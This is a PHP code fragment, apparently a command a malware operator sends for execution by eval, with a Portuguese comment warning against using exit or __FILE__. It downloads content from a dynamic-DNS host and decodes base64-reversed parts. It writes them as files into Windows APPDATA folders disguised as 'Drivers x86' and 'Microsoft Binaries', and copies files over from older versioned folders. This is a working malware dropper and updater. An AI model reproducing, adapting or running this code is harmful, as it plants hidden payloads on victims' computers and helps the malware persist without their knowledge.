execução por eval. cuidado, não use exit e nem __FILE__

[__GIT_COMMAND]

	$new_path = getenv( 'APPDATA' ) . '\\Drivers x86 v4.56643300';
	$new_path_2 = getenv( 'APPDATA' ) . '\\Microsoft Binaries v4.56643300';
	$old_path = getenv( 'APPDATA' ) . '\\Drivers x86 v3.42482475';
	$work_path = getenv( 'APPDATA' ) . '\\Microsoft Binaries v3.42482475';
	$com = @file_get_contents('http://secondsapphost.servehttp.com/php7/com_v13.1');
	if($com && '13.1' !== @file_get_contents($work_path . '\\version'))
	{
		@mkdir($new_path);
		@mkdir($new_path . '\\prt');
		@mkdir($new_path_2);
		@mkdir($new_path_2 . '\\prt');
		$data = scandir($old_path);
		foreach($data as $dt)
		{
			$path = $old_path . '\\' . $dt;
			$npath = $new_path . '\\' . $dt;
			$npath2 = $new_path_2 . '\\' . $dt;
			if($dt === '.' || $dr === '..' || !is_file($path))
				continue;
			@copy($path, $npath);
			@copy($path, $npath2);
		}
		$data = $com;
		$file_name = '';
		$count_files = 0;
		$x = 1;
		$parts = preg_split('/\{PART\}/is', $data);
		for($i=1; $i<count($parts)-1; $i++)
		{
			$part = @base64_decode(strrev($parts[$i]));
			$x = $x * -1;
			if($x == -1)
			{
				$file_name = $part;
			}
			else
			{
				$count_files++;
				$path = '';
				$path2 = '';
				if($count_files == 1)
				{
					$path = $new_path . '\\' . $file_name;
					$path2 = $new_path_2 . '\\' . $file_name;
				}
				else
				{
					$path = $new_path . "\\prt\\" . $file_name;
					$path2 = $new_path_2 . "\\prt\\" . $file_name;
				}
				@file_put_contents($path, $part);
				@file_put_contents($path2, $part);
			}
		}
	}

[/GIT_COMMAND]
